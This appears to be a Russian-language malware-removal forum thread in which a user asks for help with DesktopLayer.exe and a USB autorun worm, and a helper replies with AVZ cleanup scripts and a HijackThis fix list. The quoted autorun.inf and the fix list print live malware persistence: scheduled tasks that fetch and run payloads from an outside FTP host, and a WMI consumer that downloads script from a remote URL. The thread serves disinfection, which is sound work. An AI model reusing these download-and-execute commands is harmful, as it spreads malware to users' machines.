не могу избавиться от DesktopLayer.exe и Start

[wbread]

Доброго времени суток.

Прошу помощи в избавлении от вирусов. Своими силами не получилось.

Проблема вот в чем:
Обнаружил c:\Program Files\Microsoft\DesktopLayer.exe, не удаляется, в безопасном режиме восстанавливается.
Так же на флешке обнаружил авторан с с псевдо корзиной

Код:

[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-5-53-0618173441-1222387312-025403031-1153\SIPFediD.exe
shell\explore\command=.\RECYCLER\S-0-5-53-0618173441-1222387312-025403031-1153\SIPFediD.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-5-53-0618173441-1222387312-025403031-1153\SIPFediD.exe.................

Замечание: не могу запустить akelpad(основной редактор тотала), sublim не может загрузить некоторые плагины, не запускается UltraISo, не могу записать на флешку загрузочные Kas_usb10 и eset_sysrescue_live_enu, каспер пишет что флешка готова а вот без ultraiso второй не записать. Других косяков системы замечено пока еще не было.
Прикрепил логи по инструкции.

[Info_bot]

Уважаемый(ая) wbread, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Выполните скрипт в AVZ:

Код:

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFile('c:\program files\microsoft\desktoplayer.exe', '');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\help\lsmosee.exe', '');
 QuarantineFile('H:\autorun.inf', '');
 QuarantineFile('H:\RECYCLER\S-0-5-53-0618173441-1222387312-025403031-1153\SIPFediD.exe', '');
 DeleteFile('c:\program files\microsoft\desktoplayer.exe', '32');
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('c:\windows\help\lsmosee.exe', '32');
 DeleteFile('H:\autorun.inf', '32');
 DeleteFile('H:\RECYCLER\S-0-5-53-0618173441-1222387312-025403031-1153\SIPFediD.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

Выполните в AVZ скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Запустите HijackThis, расположенный в папке Autologger и пофиксите всё, что будет из списка (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O7 - IPSec: Name: win (2018/01/31) - {e185cfa6-501c-4d0a-8ee1-2d887b8354d2} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/01/31) - {e185cfa6-501c-4d0a-8ee1-2d887b8354d2} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/01/31) - {e185cfa6-501c-4d0a-8ee1-2d887b8354d2} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/01/31) - {e185cfa6-501c-4d0a-8ee1-2d887b8354d2} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/01/31) - {e185cfa6-501c-4d0a-8ee1-2d887b8354d2} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)

Устраняйте критическую уязвимость, иначе лечить бесполезно: http://www.catalog.update.microsoft....px?q=KB4012212

Сделайте новый лог такой версией Autologger, Ok после запуска нажимайте с зажатой клавишей Shift.